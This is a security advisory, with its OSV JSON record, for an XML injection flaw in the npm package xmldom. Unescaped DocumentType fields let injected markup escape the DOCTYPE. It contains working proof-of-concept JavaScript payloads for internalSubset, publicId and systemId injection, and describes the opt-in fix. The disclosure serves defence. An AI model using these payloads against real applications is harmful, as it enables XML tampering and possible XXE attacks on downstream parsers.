GHSA-F6WW-3GGP-FR8H
Vulnerability from github – Published: 2026-04-22 20:19 – Updated: 2026-04-22 20:19Summary
The package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim
without any escaping or validation. When these fields are set programmatically to attacker-controlled
strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is
terminated early and arbitrary markup appears outside it.
Details
DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset) validates
only qualifiedName against the XML QName production. The remaining three arguments are stored
as-is with no validation.
The XMLSerializer emits DocumentType nodes as:
<!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]>
All fields are pushed into the output buffer verbatim — no escaping, no quoting added.
internalSubset injection: The serializer wraps internalSubset with [ and ]. A value
containing ]> closes the internal subset and the DOCTYPE declaration at the injection point.
Any content after ]> in internalSubset appears outside the DOCTYPE in the serialized output as
raw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: @xmldom/xmldom ≥ 0.9.0
via createDocumentType API; 0.8.x only via direct property write.
publicId injection: The serializer emits publicId verbatim after PUBLIC with no
quoting added. A value containing an injected system identifier (e.g.,
"pubid" SYSTEM "evil") breaks the intended quoting context, injecting a fake SYSTEM entry
into the serialized DOCTYPE declaration. Identified during internal security research. Affected:
both branches, all versions back to 0.1.0.
systemId injection: The serializer emits systemId verbatim. A value containing >
terminates the DOCTYPE declaration early; content after > appears as raw XML markup outside
the DOCTYPE context. Identified during internal security research. Affected: both branches, all
versions back to 0.1.0.
The parse path is safe: the SAX parser enforces the PubidLiteral and SystemLiteral grammar
productions, which exclude the relevant characters, and the internal subset parser only accepts a
subset it can structurally validate. The vulnerability is reachable only through programmatic
createDocumentType calls with attacker-controlled arguments.
Affected code
lib/dom.js — createDocumentType (lines 898–910):
createDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {
validateQualifiedName(qualifiedName); // only qualifiedName is validated
var node = new DocumentType(PDC);
node.name = qualifiedName;
node.nodeName = qualifiedName;
node.publicId = publicId || ''; // stored verbatim
node.systemId = systemId || ''; // stored verbatim
node.internalSubset = internalSubset || ''; // stored verbatim
node.childNodes = new NodeList();
return node;
},
lib/dom.js — serializer DOCTYPE case (lines 2948–2964):
case DOCUMENT_TYPE_NODE:
var pubid = node.publicId;
var sysid = node.systemId;
buf.push(g.DOCTYPE_DECL_START, ' ', node.name);
if (pubid) {
buf.push(' ', g.PUBLIC, ' ', pubid);
if (sysid && sysid !== '.') {
buf.push(' ', sysid);
}
} else if (sysid && sysid !== '.') {
buf.push(' ', g.SYSTEM, ' ', sysid);
}
if (node.internalSubset) {
buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim
}
buf.push('>');
return;
PoC
internalSubset injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
'root',
'',
'',
']><injected/><![CDATA['
);
const doc = impl.createDocument(null, 'root', doctype);
const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
// ^^^^^^^^^^ injected element outside DOCTYPE
publicId quoting context break
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
'root',
'"injected PUBLIC_ID" SYSTEM "evil"',
'',
''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root PUBLIC "injected PUBLIC_ID" SYSTEM "evil"><root/>
// quoting context broken — SYSTEM entry injected
systemId injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
'root',
'',
'"sysid"><injected attr="pwn"/>',
''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root SYSTEM "sysid"><injected attr="pwn"/>><root/>
// > in sysid closes DOCTYPE early; <injected/> appears as sibling element
Impact
An application that programmatically constructs DocumentType nodes from user-controlled data and
then serializes the document can emit a DOCTYPE declaration where the internal subset is closed
early or where injected SYSTEM entities or other declarations appear in the serialized output.
Downstream XML parsers that re-parse the serialized output and expand entities from the injected DOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.
Fix Applied
⚠ Opt-in required. Protection is not automatic. Existing serialization calls remain vulnerable unless
{ requireWellFormed: true }is explicitly passed. Applications that pass untrusted data tocreateDocumentType()or write untrusted values directly to aDocumentTypenode'spublicId,systemId, orinternalSubsetproperties should audit allserializeToString()call sites and add the option.
XMLSerializer.serializeToString() now accepts an options object as a second argument. When { requireWellFormed: true } is passed, the serializer validates the DocumentType node's publicId, systemId, and internalSubset fields before emitting the DOCTYPE declaration and throws InvalidStateError if any field contains an injection sequence:
publicId: throws if non-empty and does not match the XMLPubidLiteralproduction (XML 1.0 [12])systemId: throws if non-empty and does not match the XMLSystemLiteralproduction (XML 1.0 [11])internalSubset: throws if it contains]>(which closes the internal subset and DOCTYPE declaration early)
All three checks apply regardless of how the invalid value entered the node — whether via createDocumentType arguments or a subsequent direct property write.
PoC — fixed path
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
// internalSubset injection
const dt1 = impl.createDocumentType('root', '', '', ']><injected/><![CDATA[');
const doc1 = impl.createDocument(null, 'root', dt1);
// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc1));
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
// Opt-in guard: throws InvalidStateError
try {
new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });
} catch (e) {
console.log(e.name, e.message);
// InvalidStateError: DocumentType internalSubset contains "]>"
}
The guard also covers post-creation property writes:
const dt2 = impl.createDocumentType('root', '', '');
dt2.systemId = '"sysid"><injected attr="pwn"/>';
const doc2 = impl.createDocument(null, 'root', dt2);
new XMLSerializer().serializeToString(doc2, { requireWellFormed: true });
// InvalidStateError: DocumentType systemId is not a valid SystemLiteral
Why the default stays verbatim
The W3C DOM Parsing and Serialization spec §3.2.1.3 defines a require well-formed flag whose default value is false. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in requireWellFormed: true flag allows applications that require injection safety to enable strict mode without breaking existing deployments.
Residual limitation
createDocumentType(qualifiedName, publicId, systemId[, internalSubset]) does not validate publicId, systemId, or internalSubset at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.
When the default serialization path is used (without requireWellFormed: true), all three fields are still emitted verbatim. Applications that do not pass requireWellFormed: true remain exposed.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@xmldom/xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@xmldom/xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0.9.0"
},
{
"fixed": "0.9.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41674"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-22T20:19:12Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nThe package serializes `DocumentType` node fields (`internalSubset`, `publicId`, `systemId`) verbatim\nwithout any escaping or validation. When these fields are set programmatically to attacker-controlled\nstrings, `XMLSerializer.serializeToString` can produce output where the DOCTYPE declaration is\nterminated early and arbitrary markup appears outside it.\n\n---\n\n## Details\n\n`DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset)` validates\nonly `qualifiedName` against the XML QName production. The remaining three arguments are stored\nas-is with no validation.\n\nThe XMLSerializer emits `DocumentType` nodes as:\n\n```\n\u003c!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]\u003e\n```\n\nAll fields are pushed into the output buffer verbatim \u2014 no escaping, no quoting added.\n\n**`internalSubset` injection:** The serializer wraps `internalSubset` with ` [` and `]`. A value\ncontaining `]\u003e` closes the internal subset and the DOCTYPE declaration at the injection point.\nAny content after `]\u003e` in `internalSubset` appears outside the DOCTYPE in the serialized output as\nraw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: `@xmldom/xmldom` \u2265 0.9.0\nvia `createDocumentType` API; 0.8.x only via direct property write.\n\n**`publicId` injection:** The serializer emits `publicId` verbatim after `PUBLIC` with no\nquoting added. A value containing an injected system identifier (e.g.,\n`\"pubid\" SYSTEM \"evil\"`) breaks the intended quoting context, injecting a fake SYSTEM entry\ninto the serialized DOCTYPE declaration. Identified during internal security research. Affected:\nboth branches, all versions back to 0.1.0.\n\n**`systemId` injection:** The serializer emits `systemId` verbatim. A value containing `\u003e`\nterminates the DOCTYPE declaration early; content after `\u003e` appears as raw XML markup outside\nthe DOCTYPE context. Identified during internal security research. Affected: both branches, all\nversions back to 0.1.0.\n\nThe parse path is safe: the SAX parser enforces the `PubidLiteral` and `SystemLiteral` grammar\nproductions, which exclude the relevant characters, and the internal subset parser only accepts a\nsubset it can structurally validate. The vulnerability is reachable only through programmatic\n`createDocumentType` calls with attacker-controlled arguments.\n\n---\n\n## Affected code\n\n**`lib/dom.js` \u2014 `createDocumentType` (lines 898\u2013910):**\n\n```js\ncreateDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {\n validateQualifiedName(qualifiedName); // only qualifiedName is validated\n var node = new DocumentType(PDC);\n node.name = qualifiedName;\n node.nodeName = qualifiedName;\n node.publicId = publicId || \u0027\u0027; // stored verbatim\n node.systemId = systemId || \u0027\u0027; // stored verbatim\n node.internalSubset = internalSubset || \u0027\u0027; // stored verbatim\n node.childNodes = new NodeList();\n return node;\n},\n```\n\n**`lib/dom.js` \u2014 serializer DOCTYPE case (lines 2948\u20132964):**\n\n```js\ncase DOCUMENT_TYPE_NODE:\n var pubid = node.publicId;\n var sysid = node.systemId;\n buf.push(g.DOCTYPE_DECL_START, \u0027 \u0027, node.name);\n if (pubid) {\n buf.push(\u0027 \u0027, g.PUBLIC, \u0027 \u0027, pubid);\n if (sysid \u0026\u0026 sysid !== \u0027.\u0027) {\n buf.push(\u0027 \u0027, sysid);\n }\n } else if (sysid \u0026\u0026 sysid !== \u0027.\u0027) {\n buf.push(\u0027 \u0027, g.SYSTEM, \u0027 \u0027, sysid);\n }\n if (node.internalSubset) {\n buf.push(\u0027 [\u0027, node.internalSubset, \u0027]\u0027); // internalSubset emitted verbatim\n }\n buf.push(\u0027\u003e\u0027);\n return;\n```\n\n---\n\n## PoC\n\n### internalSubset injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n \u0027root\u0027,\n \u0027\u0027,\n \u0027\u0027,\n \u0027]\u003e\u003cinjected/\u003e\u003c![CDATA[\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n// ^^^^^^^^^^ injected element outside DOCTYPE\n```\n\n### publicId quoting context break\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n \u0027root\u0027,\n \u0027\"injected PUBLIC_ID\" SYSTEM \"evil\"\u0027,\n \u0027\u0027,\n \u0027\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root PUBLIC \"injected PUBLIC_ID\" SYSTEM \"evil\"\u003e\u003croot/\u003e\n// quoting context broken \u2014 SYSTEM entry injected\n```\n\n### systemId injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n \u0027root\u0027,\n \u0027\u0027,\n \u0027\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u0027,\n \u0027\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root SYSTEM \"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u003e\u003croot/\u003e\n// \u003e in sysid closes DOCTYPE early; \u003cinjected/\u003e appears as sibling element\n```\n\n---\n\n## Impact\n\nAn application that programmatically constructs `DocumentType` nodes from user-controlled data and\nthen serializes the document can emit a DOCTYPE declaration where the internal subset is closed\nearly or where injected SYSTEM entities or other declarations appear in the serialized output.\n\nDownstream XML parsers that re-parse the serialized output and expand entities from the injected\nDOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.\n\n---\n\n## Fix Applied\n\n\u003e **\u26a0 Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createDocumentType()` or write untrusted values directly to a\n\u003e `DocumentType` node\u0027s `publicId`, `systemId`, or `internalSubset` properties should audit\n\u003e all `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer validates the `DocumentType` node\u0027s `publicId`, `systemId`, and `internalSubset` fields before emitting the DOCTYPE declaration and throws `InvalidStateError` if any field contains an injection sequence:\n\n- **`publicId`**: throws if non-empty and does not match the XML `PubidLiteral` production (XML 1.0 [12])\n- **`systemId`**: throws if non-empty and does not match the XML `SystemLiteral` production (XML 1.0 [11])\n- **`internalSubset`**: throws if it contains `]\u003e` (which closes the internal subset and DOCTYPE declaration early)\n\nAll three checks apply regardless of how the invalid value entered the node \u2014 whether via `createDocumentType` arguments or a subsequent direct property write.\n\n### PoC \u2014 fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\nconst impl = new DOMImplementation();\n\n// internalSubset injection\nconst dt1 = impl.createDocumentType(\u0027root\u0027, \u0027\u0027, \u0027\u0027, \u0027]\u003e\u003cinjected/\u003e\u003c![CDATA[\u0027);\nconst doc1 = impl.createDocument(null, \u0027root\u0027, dt1);\n\n// Default (unchanged): verbatim \u2014 injection present\nconsole.log(new XMLSerializer().serializeToString(doc1));\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n\n// Opt-in guard: throws InvalidStateError\ntry {\n new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: DocumentType internalSubset contains \"]\u003e\"\n}\n```\n\nThe guard also covers post-creation property writes:\n\n```js\nconst dt2 = impl.createDocumentType(\u0027root\u0027, \u0027\u0027, \u0027\u0027);\ndt2.systemId = \u0027\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u0027;\nconst doc2 = impl.createDocument(null, \u0027root\u0027, dt2);\nnew XMLSerializer().serializeToString(doc2, { requireWellFormed: true });\n// InvalidStateError: DocumentType systemId is not a valid SystemLiteral\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec \u00a73.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\n`createDocumentType(qualifiedName, publicId, systemId[, internalSubset])` does not validate `publicId`, `systemId`, or `internalSubset` at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), all three fields are still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.",
"id": "GHSA-f6ww-3ggp-fr8h",
"modified": "2026-04-22T20:19:12Z",
"published": "2026-04-22T20:19:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314"
},
{
"type": "PACKAGE",
"url": "https://github.com/xmldom/xmldom"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/releases/tag/0.8.13"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/releases/tag/0.9.10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "xmldom has XML injection through unvalidated DocumentType serialization"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.